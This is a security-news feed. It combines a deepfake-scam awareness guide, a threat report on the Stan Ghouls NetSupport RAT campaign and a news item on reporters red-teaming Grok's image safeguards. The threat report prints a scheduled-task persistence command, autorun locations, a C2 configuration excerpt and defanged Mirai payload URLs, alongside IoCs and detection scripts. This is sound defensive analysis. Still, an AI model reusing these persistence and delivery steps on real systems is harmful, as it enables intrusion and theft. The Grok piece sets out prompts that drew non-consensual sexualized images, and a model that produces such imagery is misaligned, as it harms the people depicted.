Living off the AI: The Next Evolution of Attacker Tradecraft

6 February 2026 at 13:00

Living off the AI isn’t a hypothetical but a natural continuation of the tradecraft we’ve all been defending against, now mapped onto assistants, agents, and MCP.

The post Living off the AI: The Next Evolution of Attacker Tradecraft appeared first on SecurityWeek.

Airrived Emerges From Stealth With $6.1 Million in Funding

6 February 2026 at 10:40

The startup aims to unify SOC, GRC, IAM, vulnerability management, IT, and business operations through its Agentic OS platform.

The post Airrived Emerges From Stealth With $6.1 Million in Funding appeared first on SecurityWeek.

How to protect yourself from deepfake scammers and save your money | Kaspersky official blog

6 February 2026 at 12:41

Technologies for creating fake video and voice messages are accessible to anyone these days, and scammers are busy mastering the art of deepfakes. No one is immune to the threat — modern neural networks can clone a person’s voice from just three to five seconds of audio, and create highly convincing videos from a couple of photos. We’ve previously discussed how to distinguish a real photo or video from a fake and trace its origin to when it was taken or generated. Now let’s take a look at how attackers create and use deepfakes in real time, how to spot a fake without forensic tools, and how to protect yourself and loved ones from “clone attacks”.

How deepfakes are made

Scammers gather source material for deepfakes from open sources: webinars, public videos on social networks and channels, and online speeches. Sometimes they simply call identity theft targets and keep them on the line for as long as possible to collect data for maximum-quality voice cloning. And hacking the messaging account of someone who loves voice and video messages is the ultimate jackpot for scammers. With access to video recordings and voice messages, they can generate realistic fakes that 95% of folks are unable to tell apart from real messages from friends or colleagues.

The tools for creating deepfakes vary widely, from simple Telegram bots to professional generators like HeyGen and ElevenLabs. Scammers use deepfakes together with social engineering: for example, they might first simulate a messenger app call that appears to drop out constantly, then send a pre-generated video message of fairly low quality, blaming it on the supposedly poor connection.

In most cases, the message is about some kind of emergency in which the deepfake victim requires immediate help. Naturally the “friend in need” is desperate for money, but, as luck would have it, they’ve no access to an ATM, or have lost their wallet, and the bad connection rules out an online transfer. The solution is, of course, to send the money not directly to the “friend”, but to a fake account, phone number, or cryptowallet.

Such scams often involve pre-generated videos, but of late real-time deepfake streaming services have come into play. Among other things, these allow users to substitute their own face in a chat-roulette or video call.

How to recognize a deepfake

If you see a familiar face on the screen together with a recognizable voice but are asked unusual questions, chances are it’s a deepfake scam. Fortunately, there are certain visual, auditory, and behavioral signs that can help even non-techies to spot a fake.

Visual signs of a deepfake

Lighting and shadow issues. Deepfakes often ignore the physics of light: the direction of shadows on the face and in the background may not match, and glares on the skin may look unnatural or not be there at all. Or the person in the video may be half-turned toward the window, but their face is lit by studio lighting. This example will be familiar to participants in video conferences, where substituted background images can appear extremely unnatural.

Blurred or floating facial features. Pay attention to the hairline: deepfakes often show blurring, flickering, or unnatural color transitions along this area. These artifacts are caused by flaws in the algorithm for superimposing the cloned face onto the original.

Unnaturally blinking or “dead” eyes. A person blinks on average 10 to 20 times per minute. Some deepfakes blink too rarely, others too often. Eyelid movements can be too abrupt, and sometimes blinking is out of sync, with one eye not matching the other. “Glassy” or “dead-eye” stares are also characteristic of deepfakes. And sometimes a pupil (usually just the one) may twitch randomly due to a neural network hallucination.
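
The blink-rate cue lends itself to rough automation. Below is a minimal sketch of the widely used eye-aspect-ratio (EAR) heuristic for counting blinks per minute; it assumes dlib with its separately downloaded 68-point landmark model and OpenCV for frame capture, and the 0.21 threshold and file names are illustrative starting points rather than calibrated values. An abnormal rate is one more signal, not proof of a fake.

# Hedged sketch: blink-rate estimation via the eye-aspect-ratio (EAR)
# heuristic. Assumes dlib's 68-point landmark model is present locally;
# the threshold and paths are illustrative assumptions.
import math

import cv2
import dlib

PREDICTOR_PATH = "shape_predictor_68_face_landmarks.dat"  # assumed local file
EAR_THRESHOLD = 0.21   # eye treated as closed below this ratio
CONSEC_FRAMES = 2      # frames the eye must stay closed to count as a blink

detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(PREDICTOR_PATH)

def eye_aspect_ratio(p):
    # EAR = (|p2-p6| + |p3-p5|) / (2 * |p1-p4|) over the six eye landmarks
    d = lambda a, b: math.dist((a.x, a.y), (b.x, b.y))
    return (d(p[1], p[5]) + d(p[2], p[4])) / (2.0 * d(p[0], p[3]))

def blinks_per_minute(video_path):
    cap = cv2.VideoCapture(video_path)
    fps = cap.get(cv2.CAP_PROP_FPS) or 30.0
    blinks = closed = frames = 0
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        frames += 1
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        for face in detector(gray):
            lm = predictor(gray, face)
            left = [lm.part(i) for i in range(36, 42)]   # left-eye landmarks
            right = [lm.part(i) for i in range(42, 48)]  # right-eye landmarks
            ear = (eye_aspect_ratio(left) + eye_aspect_ratio(right)) / 2.0
            if ear < EAR_THRESHOLD:
                closed += 1
            else:
                if closed >= CONSEC_FRAMES:
                    blinks += 1
                closed = 0
    cap.release()
    minutes = frames / fps / 60.0
    return blinks / minutes if minutes else 0.0

# A result far outside the ~10-20 blinks/min human norm warrants suspicion.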

When analyzing a static image such as a photograph, it’s also a good idea to zoom in on the eyes and compare the reflections on the irises — in real photos they’ll be identical; in deepfakes — often not.

Look at the reflections and glares in the eyes in the real photo (left) and the generated image (right) — although similar, specular highlights in the eyes in the deepfake are different. Source

Lip-syncing issues. Even top-quality deepfakes trip up when it comes to synchronizing speech with lip movements. A delay of just a hundred milliseconds is noticeable to the naked eye. It’s often possible to observe an irregular lip shape when pronouncing the sounds m, f, or t. All of these are telltale signs of an AI-modeled face.

Static or blurred background. In generated videos, the background often looks unrealistic: it might be too blurry; its elements may not interact with the on-screen face; or sometimes the image behind the person remains motionless even when the camera moves.

Odd facial expressions. Deepfakes do a poor job of imitating emotion: facial expressions may not change in line with the conversation; smiles look frozen, and the fine wrinkles and folds that appear in real faces when expressing emotion are absent — the fake looks botoxed.

Auditory signs of a deepfake

Early AI generators modeled speech from small, monotonous phonemes, and when the intonation changed, there was an audible shift in pitch, making it easy to recognize a synthesized voice. Although today’s technology has advanced far beyond this, there are other signs that still give away generated voices.

Wooden or electronic tone. If the voice sounds unusually flat, without natural intonation variations, or there’s a vaguely electronic quality to it, there’s a high probability you’re talking to a deepfake. Real speech contains many variations in tone and natural imperfections.

No breathing sounds. Humans take micropauses and breathe in between phrases — especially in long sentences, not to mention small coughs and sniffs. Synthetic voices often lack these nuances, or place them unnaturally.

Robotic speech or sudden breaks. The voice may abruptly cut off, words may sound “glued” together, and the stress and intonation may not be what you’re used to hearing from your friend or colleague.

Lack of… shibboleths in speech. Pay attention to speech patterns (such as accent or phrases) that are typical of the person in real life but are poorly imitated (if at all) by the deepfake.

To mask visual and auditory artifacts, scammers often simulate poor connectivity by sending a noisy video or audio message. A low-quality video stream or media file is the first red flag that you should verify the person at the other end.

Behavioral signs of a deepfake

Analyzing the movements and behavioral nuances of the caller is perhaps still the most reliable way to spot a deepfake in real time.

Can’t turn their head. During the video call, ask the person to turn their head so they’re looking completely to the side. Most deepfakes are created using portrait photos and videos, so a sideways turn will cause the image to float, distort, or even break up. AI startup Metaphysic.ai — creators of viral Tom Cruise deepfakes — confirm that head rotation is the most reliable deepfake test at present.

Unnatural gestures. Ask the on-screen person to perform a spontaneous action: wave their hand in front of their face; scratch their nose; take a sip from a cup; cover their eyes with their hands; or point to something in the room. Deepfakes have trouble handling impromptu gestures — hands may pass ghostlike through objects or the face, or fingers may appear distorted, or move unnaturally.

Ask a deepfake to wave a hand in front of its face, and the hand may appear to dissolve. Source

Screen sharing. If the conversation is work-related, ask your chat partner to share their screen and show an on-topic file or document. Without access to your real-life colleague’s device, this will be virtually impossible to fake.

Can’t answer tricky questions. Ask something that only the genuine article could know, for example: “What meeting do we have at work tomorrow?”, “Where did I get this scar?”, “Where did we go on vacation two years ago?” A scammer won’t be able to answer questions if the answers aren’t present in the hacked chats or publicly available sources.

Don’t know the codeword. Agree with friends and family on a secret word or phrase for emergency use to confirm identity. If a panicked relative asks you to urgently transfer money, ask them for the family codeword. A flesh-and-blood relation will reel it off; a deepfake-armed fraudster won’t.

What to do if you encounter a deepfake

If you’ve even the slightest suspicion that what you’re talking to isn’t a real human but a deepfake, follow our tips below.

  • End the chat and call back. The surest check is to end the video call and connect with the person through another channel: call or text their regular phone, or message them in another app. If your opposite number is unhappy about this, pretend the connection dropped out.
  • Don’t be pressured into sending money. A favorite trick is to create a false sense of urgency. “Mom, I need money right now, I’ve had an accident”; “I don’t have time to explain”; “If you don’t send it in ten minutes, I’m done for!” A real person usually won’t mind waiting a few extra minutes while you double-check the information.
  • Tell your friend or colleague they’ve been hacked. If a call or message from someone in your contacts comes from a new number or an unfamiliar account, treat that as yet another red flag: attackers often create fake profiles or use temporary numbers. But if you get a deepfake call from a contact in a messenger app or your address book, inform them immediately that their account has been hacked — and do it via another communication channel. This will help them take steps to regain access to their account (see our detailed instructions for Telegram and WhatsApp), and to minimize potential damage to other contacts, for example, by posting about the hack.

How to stop your own face getting deepfaked

  • Restrict public access to your photos and videos. Hide your social media profiles from strangers, limit your friends list to real people, and delete videos with your voice and face from public access.
  • Don’t give suspicious apps access to your smartphone camera or microphone. Scammers can collect biometric data through fake apps disguised as games or utilities. To stop such programs from getting on your devices, use a proven all-in-one security solution.
  • Use passkeys, unique passwords, and two-factor authentication (2FA) where possible. Even if scammers do create a deepfake with your face, 2FA will make it much harder to access your accounts and use them to send deepfakes. A cross-platform password manager with support for passkeys and 2FA codes can help out here.
  • Teach friends and family how to spot deepfakes. Elderly relatives, young children, and anyone new to technology are the most vulnerable targets. Educate them about scams, show them examples of deepfakes, and practice using a family codeword.
  • Use content analyzers. While there’s no silver bullet against deepfakes, there are services that can identify AI-generated content with high accuracy. For graphics, these include Undetectable AI and Illuminarty; for video — Deepware; and for all types of deepfakes — Sensity AI and Hive Moderation.
  • Keep a cool head. Scammers apply psychological pressure to hurry victims into acting rashly. Remember the golden rule: if a call, video, or voice message from anyone you know rouses even the slightest suspicion, end the conversation and make contact through another channel.

To protect yourself and loved ones from being scammed, learn more about how scammers deploy deepfakes.

Researchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign

5 February 2026 at 15:00

Criminals are using AI to clone professional websites at an industrial scale. A new report shows how one AI-powered network grew to 150+ domains by hiding behind Cloudflare and rotating IP ranges.

The post Researchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign appeared first on SecurityWeek.

Critical N8n Sandbox Escape Could Lead to Server Compromise

5 February 2026 at 12:23

The vulnerability could allow attackers to execute arbitrary commands and steal credentials and other secrets.

The post Critical N8n Sandbox Escape Could Lead to Server Compromise appeared first on SecurityWeek.

Stan Ghouls targeting Russia and Uzbekistan with NetSupport RAT

5 February 2026 at 10:00

Introduction

Stan Ghouls (also known as Bloody Wolf) is a cybercriminal group that has been launching targeted attacks against organizations in Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. These attackers primarily have their sights set on the manufacturing, finance, and IT sectors. Their campaigns are meticulously prepared and tailored to specific victims, featuring a signature toolkit of custom Java-based malware loaders and a sprawling infrastructure with resources dedicated to specific campaigns.

We continuously track Stan Ghouls’ activity, providing our clients with intel on their tactics, techniques, procedures, and latest campaigns. In this post, we share the results of our most recent deep dive into a campaign targeting Uzbekistan, where we identified roughly 50 victims. About 10 devices in Russia were also hit, with a handful of others scattered across Kazakhstan, Turkey, Serbia, and Belarus (though those last three were likely just collateral damage).

During our investigation, we spotted shifts in the attackers’ infrastructure – specifically, a batch of new domains. We also uncovered evidence suggesting that Stan Ghouls may have added IoT-focused malware to their arsenal.

Technical details

Threat evolution

Stan Ghouls relies on phishing emails packed with malicious PDF attachments as their initial entry point. Historically, the group’s weapon of choice was the remote access Trojan (RAT) STRRAT, also known as Strigoi Master. Last year, however, they switched strategies, opting to misuse legitimate software, NetSupport, to maintain control over infected machines.

Given Stan Ghouls’ targeting of financial institutions, we believe their primary motive is financial gain. That said, their heavy use of RATs may also hint at cyberespionage.

Like other organized cybercrime groups, Stan Ghouls frequently refreshes its infrastructure. To track their campaigns effectively, you have to continuously analyze their activity.

Initial infection vector

As we’ve mentioned, Stan Ghouls’ primary – and currently only – delivery method is spear phishing. Specifically, they favor emails loaded with malicious PDF attachments. This has been backed up by research from several of our industry peers (1, 2, 3). Interestingly, the attackers prefer to use local languages rather than opting for international mainstays like Russian or English. Below is an example of an email spotted in a previous campaign targeting users in Kyrgyzstan.

Example of a phishing email from a previous Stan Ghouls campaign

The email is written in Kyrgyz and translates to: “The service has contacted you. Materials for review are attached. Sincerely”.

The attachment was a malicious PDF file titled “Постановление_Районный_суд_Кчрм_3566_28-01-25_OL4_scan.pdf” (the title, written in Russian, presented it as a district court order).

During the most recent campaign, which primarily targeted victims in Uzbekistan, the attackers deployed spear-phishing emails written in Uzbek:

Example of a spear-phishing email from the latest campaign

The email text can be translated as follows:

[redacted] AKMALZHON IBROHIMOVICH

You will receive a court notice. Application for retrial. The case is under review by the district court. Judicial Service.

Mustaqillik Street, 147 Uraboshi Village, Quva District.

The attachment, named E-SUD_705306256_ljro_varaqasi.pdf (MD5: 7556e2f5a8f7d7531f28508f718cb83d), is a standard one-page decoy PDF:

The embedded decoy document

Notice that the attackers claim that the “case materials” (which are actually the malicious loader) can only be opened using the Java Runtime Environment.

They even helpfully provide a link for the victim to download and install it from the official website.

The malicious loader

The decoy document contains identical text in both Russian and Uzbek, featuring two links that point to the malicious loader:

  • Uzbek link (“- Ish materiallari 09.12.2025 y”): hxxps://mysoliq-uz[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/
  • Russian link (“- Материалы дела 09.12.2025 г.”): hxxps://my-xb[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/

Both links lead to the exact same JAR file (MD5: 95db93454ec1d581311c832122d21b20).
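
For defenders triaging mail attachments, a quarantined JAR can be checked against that hash with nothing but the standard library. A minimal sketch; the file path is a placeholder.

# Hedged sketch: compare a quarantined attachment against the loader hash
# published above. hashlib is stdlib; "suspicious.jar" is a placeholder path.
import hashlib

LOADER_MD5 = "95db93454ec1d581311c832122d21b20"

def md5_of(path, chunk_size=65536):
    digest = hashlib.md5()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

if md5_of("suspicious.jar") == LOADER_MD5:
    print("[!] attachment matches the Stan Ghouls loader IoC")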

It’s worth noting that these attackers are constantly updating their infrastructure, registering new domains for every new campaign. In the relatively short history of this threat, we’ve already mapped out over 35 domains tied to Stan Ghouls.

The malicious loader handles three main tasks:

  1. Displaying a fake error message to trick the user into thinking the application can’t run. The message in the screenshot translates to: “This application cannot be run in your OS. Please use another device.”

    Fake error message

  2. Checking that the number of previous RAT installation attempts is less than three. If the limit is reached, the loader terminates and throws the following error: “Urinishlar chegarasidan oshildi. Boshqa kompyuterni tekshiring.” This translates to: “Attempt limit reached. Try another computer.”

    The limitCheck procedure for verifying the number of RAT download attempts

  3. Downloading a remote management utility from a malicious domain and saving it to the victim’s machine. Stan Ghouls loaders typically contain a list of several domains and will iterate through them until they find one that’s live.

    The performanceResourceUpdate procedure for downloading the remote management utility

The loader fetches the following files, which make up the components of the NetSupport RAT: PCICHEK.DLL, client32.exe, advpack.dll, msvcr100.dll, remcmdstub.exe, ir50_qcx.dll, client32.ini, AudioCapture.dll, kbdlk41a.dll, KBDSF.DLL, tcctl32.dll, HTCTL32.DLL, kbdibm02.DLL, kbd101c.DLL, kbd106n.dll, ir50_32.dll, nskbfltr.inf, NSM.lic, pcicapi.dll, PCICL32.dll, qwave.dll. This list is hardcoded in the malicious loader’s body. To ensure the download was successful, it checks for the presence of the client32.exe executable. If the file is found, the loader generates a NetSupport launch script (run.bat), drops it into the folder with the other files, and executes it:

The createBatAndRun procedure for creating and executing the run.bat file, which then launches the NetSupport RAT
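
Because the file list is hardcoded, the drop leaves a recognizable on-disk footprint. The sketch below is a rough triage aid rather than a detection rule: it walks a directory tree and flags folders holding several of those NetSupport components next to a run.bat. The scan root and match threshold are assumptions to tune for your environment.

# Hedged sketch: look for directories containing the hardcoded NetSupport
# file set together with the run.bat launcher. Scan root and MIN_MATCHES
# are illustrative assumptions, not tested detection logic.
import os

NETSUPPORT_FILES = {
    "client32.exe", "client32.ini", "pcichek.dll", "pcicl32.dll",
    "pcicapi.dll", "htctl32.dll", "tcctl32.dll", "remcmdstub.exe", "nsm.lic",
}
MIN_MATCHES = 5  # enough overlap to be suspicious; tune for your estate

def scan(root=r"C:\Users"):
    for dirpath, _dirs, filenames in os.walk(root):  # os.walk skips unreadable dirs
        names = {n.lower() for n in filenames}
        hits = NETSUPPORT_FILES & names
        if len(hits) >= MIN_MATCHES and "run.bat" in names:
            print(f"[!] possible NetSupport drop: {dirpath} ({sorted(hits)})")

if __name__ == "__main__":
    scan()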

The loader also ensures NetSupport persistence by adding it to startup using the following three methods:

  1. It creates an autorun script named SoliqUZ_Run.bat and drops it into the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup):

    The generateAutorunScript procedure for creating the batch file and placing it in the Startup folder

  2. It adds the run.bat file to the registry’s autorun key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malicious_key_name).

    The registryStartupAdd procedure for adding the RAT launch script to the registry autorun key

  3. It creates a scheduled task to trigger run.bat using the following command:
    schtasks /Create /TN "[malicious_task_name]" /TR "[path_to_run.bat]" /SC ONLOGON /RL LIMITED /F /RU "[%USERNAME%]"

    The installStartupTask procedure for creating a scheduled task to launch the NetSupport RAT (via run.bat)
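
All three persistence locations can be swept quickly on a suspect Windows host. A minimal sketch follows; since the registry key and task names used in the campaign are redacted above, it simply greps for the run.bat launcher itself, and it assumes the standard winreg module and the schtasks CLI (Windows-only).

# Hedged sketch: sweep the three persistence spots named above for run.bat
# references on a Windows host. Key/task names are redacted in the report,
# so this only matches the launcher script itself.
import os
import subprocess
import winreg  # Windows-only stdlib module

def check_startup_folder():
    startup = os.path.expandvars(
        r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")
    for name in os.listdir(startup):
        if name.lower().endswith(".bat"):
            print(f"[startup folder] {name}")

def check_run_key():
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                         r"Software\Microsoft\Windows\CurrentVersion\Run")
    index = 0
    while True:
        try:
            name, value, _type = winreg.EnumValue(key, index)
        except OSError:  # no more values
            break
        if "run.bat" in str(value).lower():
            print(f"[HKCU Run key] {name} -> {value}")
        index += 1

def check_scheduled_tasks():
    out = subprocess.run(["schtasks", "/Query", "/FO", "CSV", "/V"],
                         capture_output=True, text=True).stdout
    for line in out.splitlines():
        if "run.bat" in line.lower():
            print(f"[scheduled task] {line}")

if __name__ == "__main__":
    check_startup_folder()
    check_run_key()
    check_scheduled_tasks()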

Once the NetSupport RAT is downloaded, installed, and executed, the attackers gain total control over the victim’s machine. While we don’t have enough telemetry to say with 100% certainty what they do once they’re in, the heavy focus on finance-related organizations suggests that the group is primarily after its victims’ money. That said, we can’t rule out cyberespionage either.

Malicious utilities for targeting IoT infrastructure

Previous Stan Ghouls attacks targeting organizations in Kyrgyzstan, as documented by Group-IB researchers, featured a NetSupport RAT configuration file client32.ini with the MD5 hash cb9c28a4c6657ae5ea810020cb214ff0. While reports mention the Kyrgyzstan campaign kicked off in June 2025, Kaspersky solutions first flagged this exact config file on May 16, 2025. At that time, it contained the following NetSupport RAT command-and-control server info:

...
[HTTP]
CMPI=60
GatewayAddress=hgame33[.]com:443
GSK=FN:L?ADAFI:F?BCPGD;N>IAO9J>J@N
Port=443
SecondaryGateway=ravinads[.]com:443
SecondaryPort=443
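
When a recovered client32.ini is on hand, the C2 hosts can be lifted straight from the [HTTP] section for blocklisting. A minimal sketch, assuming a complete (untruncated) file and Python's stdlib configparser:

# Hedged sketch: extract NetSupport gateway hosts from a recovered
# client32.ini. Interpolation is disabled so raw values such as the GSK
# string cannot trip the parser. Hosts are defanged in the post; a real
# config would contain live domains.
import configparser

def extract_gateways(path="client32.ini"):
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read(path)
    hosts = []
    if cfg.has_section("HTTP"):
        for field in ("GatewayAddress", "SecondaryGateway"):
            value = cfg.get("HTTP", field, fallback=None)
            if value:
                hosts.append(value.rsplit(":", 1)[0])  # strip the port
    return hosts

print(extract_gateways())  # e.g. ['hgame33.com', 'ravinads.com']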

At the time of our January 2026 investigation, our telemetry showed that the domain specified in that config, hgame33[.]com, was also hosting the following files:

  • hxxp://www.hgame33[.]com/00101010101001/morte.spc
  • hxxp://hgame33[.]com/00101010101001/debug
  • hxxp://www.hgame33[.]com/00101010101001/morte.x86
  • hxxp://www.hgame33[.]com/00101010101001/morte.mpsl
  • hxxp://www.hgame33[.]com/00101010101001/morte.arm7
  • hxxp://www.hgame33[.]com/00101010101001/morte.sh4
  • hxxp://hgame33[.]com/00101010101001/morte.arm
  • hxxp://hgame33[.]com/00101010101001/morte.i686
  • hxxp://hgame33[.]com/00101010101001/morte.arc
  • hxxp://hgame33[.]com/00101010101001/morte.arm5
  • hxxp://hgame33[.]com/00101010101001/morte.arm6
  • hxxp://www.hgame33[.]com/00101010101001/morte.m68k
  • hxxp://www.hgame33[.]com/00101010101001/morte.ppc
  • hxxp://www.hgame33[.]com/00101010101001/morte.x86_64
  • hxxp://hgame33[.]com/00101010101001/morte.mips

All of these files belong to the infamous IoT malware Mirai. Since they were sitting on a server tied to the Stan Ghouls campaign targeting Kyrgyzstan, we can hypothesize – with a low degree of confidence – that the group has expanded its toolkit to include IoT-based threats. However, it’s also possible that the group simply shared its infrastructure with other threat actors who were the ones actually wielding Mirai. This theory is backed up by the fact that the domain’s registration info was last updated on July 4, 2025, at 11:46:11 – well after Stan Ghouls’ activity in May and June.
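
For teams hunting similar staging servers, the multi-architecture naming scheme is itself a useful signature. Below is a minimal sketch that flags Mirai-style payload URLs in a line-oriented proxy log; the one-URL-per-line format is an assumption, and real logs will need field parsing first.

# Hedged sketch: flag Mirai-style multi-arch payload URLs (as listed above)
# in proxy logs read from stdin. Assumes one URL per log line.
import re
import sys

ARCHES = r"(?:x86(?:_64)?|i686|mips|mpsl|arm[4-7]?|ppc|m68k|sh4|spc|arc)"
MIRAI_URL = re.compile(rf"https?://\S+/\w+\.{ARCHES}\b", re.IGNORECASE)

for line in sys.stdin:
    if MIRAI_URL.search(line):
        print(f"[!] Mirai-style payload URL: {line.strip()}")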

Attribution

We attribute this campaign to the Stan Ghouls (Bloody Wolf) group with a high degree of confidence, based on the following similarities to the attackers’ previous campaigns:

  1. Substantial code overlaps were found within the malicious loaders. For example:
    Code snippet from sample 1acd4592a4eb0c66642cc7b07213e9c9584c6140210779fbc9ebb76a90738d5e, the loader from the Group-IB report

    Code snippet from sample 95db93454ec1d581311c832122d21b20, the NetSupport loader described here

  2. Decoy documents in both campaigns look identical.
    Decoy document 5d840b741d1061d51d9786f8009c37038c395c129bee608616740141f3b202bb from the campaign reported by Group-IB

    Decoy document 106911ba54f7e5e609c702504e69c89a used in the campaign described here

  3. In both current and past campaigns, the attackers utilized loaders written in Java. Given that Java has fallen out of fashion with malicious loader authors in recent years, it serves as a distinct fingerprint for Stan Ghouls.

Victims

We identified approximately 50 victims of this campaign in Uzbekistan, alongside 10 in Russia and a handful of others in Kazakhstan, Turkey, Serbia, and Belarus (we suspect the infections in these last three countries were accidental). Nearly all phishing emails and decoy files in this campaign were written in Uzbek, which aligns with the group’s track record of leveraging the native languages of their target countries.

Most of the victims are tied to industrial manufacturing, finance, and IT. Furthermore, we observed infection attempts on devices within government organizations, logistics companies, medical facilities, and educational institutions.

It is worth noting that over 60 victims is quite a high headcount for a sophisticated campaign. This suggests the attackers have enough resources to maintain manual remote control over dozens of infected devices simultaneously.

Takeaways

In this post, we’ve broken down the recent campaign by the Stan Ghouls group. The attackers set their sights on organizations in industrial manufacturing, IT, and finance, primarily located in Uzbekistan. However, the ripple effect also reached Russia, Kazakhstan, and a few, likely accidental, victims elsewhere.

With over 60 targets hit, this is a remarkably high volume for a sophisticated targeted campaign. It points to the significant resources these actors are willing to pour into their operations. Interestingly, despite this, the group sticks to a familiar toolkit including the legitimate NetSupport remote management utility and their signature custom Java-based loader. The only thing they seem to keep updating is their infrastructure. For this specific campaign, they employed two new domains to house their malicious loader and one new domain dedicated to hosting NetSupport RAT files.

One curious discovery was the presence of Mirai files on a domain linked to the group’s previous campaigns. This might suggest Stan Ghouls are branching out into IoT malware, though it’s still too early to call it with total certainty.

We’re keeping a close watch on Stan Ghouls and will continue to keep our customers in the loop regarding the group’s latest moves. Kaspersky products provide robust protection against this threat at every stage of the attack lifecycle.

Indicators of compromise

* Additional IoCs and a YARA rule for detecting Stan Ghouls activity are available to customers of our Threat Intelligence Reporting service. For more details, contact us at crimewareintel@kaspersky.com.

PDF decoys

B4FF4AA3EBA9409F9F1A5210C95DC5C3
AF9321DDB4BEF0C3CD1FF3C7C786F0E2
056B75FE0D230E6FF53AC508E0F93CCB
DB84FEBFD85F1469C28B4ED70AC6A638
649C7CACDD545E30D015EDB9FCAB3A0C
BE0C87A83267F1CE13B3F75C78EAC295
78CB3ABD00A1975BEBEDA852B2450873
51703911DC437D4E3910CE7F866C970E
FA53B0FCEF08F8FF3FFDDFEE7F1F4F1A
79D0EEAFB30AA2BD4C261A51104F6ACC
8DA8F0339D17E2466B3D73236D18B835
299A7E3D6118AD91A9B6D37F94AC685B
62AFACC37B71D564D75A58FC161900C3
047A600E3AFBF4286175BADD4D88F131
ED0CCADA1FE1E13EF78553A48260D932
C363CD87178FD660C25CDD8D978685F6
61FF22BA4C3DF7AE4A936FCFDEB020EA
B51D9EDC1DC8B6200F260589A4300009
923557554730247D37E782DB3BEA365D
60C34AD7E1F183A973FB8EE29DC454E8
0CC80A24841401529EC9C6A845609775
0CE06C962E07E63D780E5C2777A661FC

Malicious loaders

1b740b17e53c4daeed45148bfbee4f14
3f99fed688c51977b122789a094fec2e
8b0bbe7dc960f7185c330baa3d9b214c
95db93454ec1d581311c832122d21b20
646a680856f837254e6e361857458e17
8064f7ac9a5aa845ded6a1100a1d5752
d0cf8946acd3d12df1e8ae4bb34f1a6e
db796d87acb7d980264fdcf5e94757f0
e3cb4dafa1fb596e1e34e4b139be1b05
e0023eb058b0c82585a7340b6ed4cc06
0bf01810201004dcc484b3396607a483
4C4FA06BD840405FBEC34FE49D759E8D
A539A07891A339479C596BABE3060EA6
b13f7ccbedfb71b0211c14afe0815b36
f14275f8f420afd0f9a62f3992860d68
3f41091afd6256701dd70ac20c1c79fe
5c4a57e2e40049f8e8a6a74aa8085c80
7e8feb501885eff246d4cb43c468b411
8aa104e64b00b049264dc1b01412e6d9
8c63818261735ddff2fe98b3ae23bf7d

Malicious domains

mysoliq-uz[.]com
my-xb[.]com
xarid-uz[.]com
ach-uz[.]com
soliq-uz[.]com
minjust-kg[.]com
esf-kg[.]com
taxnotice-kg[.]com
notice-kg[.]com
proauditkg[.]com
kgauditcheck[.]com
servicedoc-kg[.]com
auditnotice-kg[.]com
tax-kg[.]com
rouming-uz[.]com
audit-kg[.]com
kyrgyzstanreview[.]com
salyk-notofocations[.]com
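
The domains above are defanged with the usual hxxp/[.] convention; here is a tiny helper to refang them for blocklist ingestion (and to defang again before sharing). This is purely a formatting utility.

# Hedged helper: convert between defanged and live forms of the indicators
# listed above. Formatting only; nothing here touches the network.
def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".").replace("hxxp", "http")

def defang(indicator: str) -> str:
    return indicator.replace(".", "[.]").replace("http", "hxxp")

assert refang("mysoliq-uz[.]com") == "mysoliq-uz.com"
assert defang("hgame33.com") == "hgame33[.]com"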

Grok continues producing sexualized images after promised fixes

4 February 2026 at 14:50

Journalists decided to test whether the Grok chatbot still generates non‑consensual sexualized images, even after xAI, Elon Musk’s artificial intelligence company, and X, the social media platform formerly known as Twitter, promised tighter safeguards.

Unsurprisingly, it does.

After scrutiny from regulators all over the world—triggered by reports that Grok could generate sexualized images of minors—xAI framed it as an “isolated” lapse and said it was urgently fixing “lapses in safeguards.”

A Reuters retest suggests the core abuse pattern remains. Reuters had nine reporters run dozens of controlled prompts through Grok after X announced new limits on sexualized content and image editing. In the first round, Grok produced sexualized imagery in response to 45 of 55 prompts. In 31 of those 45, the reporters explicitly said the subject was vulnerable or would be humiliated by the pictures.

A second round, five days later, still yielded sexualized images in 29 of 43 prompts (about 67%, only modestly down from roughly 82% in the first round), even when reporters said the subjects had not consented.

Competing systems from OpenAI, Google, and Meta refused identical prompts and instead warned users against generating non‑consensual content.

The prompts were deliberately framed as real‑world abuse scenarios. Reporters told Grok the photos were of friends, co-workers, or strangers who were body‑conscious, timid, or survivors of abuse, and that they had not agreed to editing. Despite that, Grok often complied—for example, turning a “friend” into a woman in a revealing purple two‑piece or putting a male acquaintance into a small gray bikini, oiled up and posed suggestively. In only seven cases did Grok explicitly reject requests as inappropriate; in others it failed silently, returning generic errors or generating different people instead.

The result is a system illustrating the same lesson its creators say they’re trying to learn: if you ship powerful visual models without exhaustive abuse testing and robust guardrails, people will use them to sexualize and humiliate others, including children. Grok’s record so far suggests that lesson still hasn’t sunk in.

Grok limited AI image editing to paid users after the backlash. But paywalling image tools—and adding new curbs—looks more like damage control than a fundamental safety reset. Grok still accepts prompts that describe non‑consensual use, still sexualizes vulnerable subjects, and still behaves more permissively than rival systems when asked to generate abusive imagery. For victims, the distinction between “public” and private generations is meaningless if their photos can be weaponized in DMs or closed groups at scale.

Sharing images

If you’ve ever wondered why some parents post images of their children with a smiley emoji across their face, this is part of the reason.

Don’t make it easy for strangers to copy, reuse, or manipulate your photos.

This is another compelling reason to reduce your digital footprint. Think carefully before posting photos of yourself, your children, or other sensitive information on public social media accounts.

And treat everything you see online—images, voices, text—as potentially AI-generated unless it can be independently verified. Such content is used not only to sway opinions, but also to solicit money, extract personal information, or create abusive material.


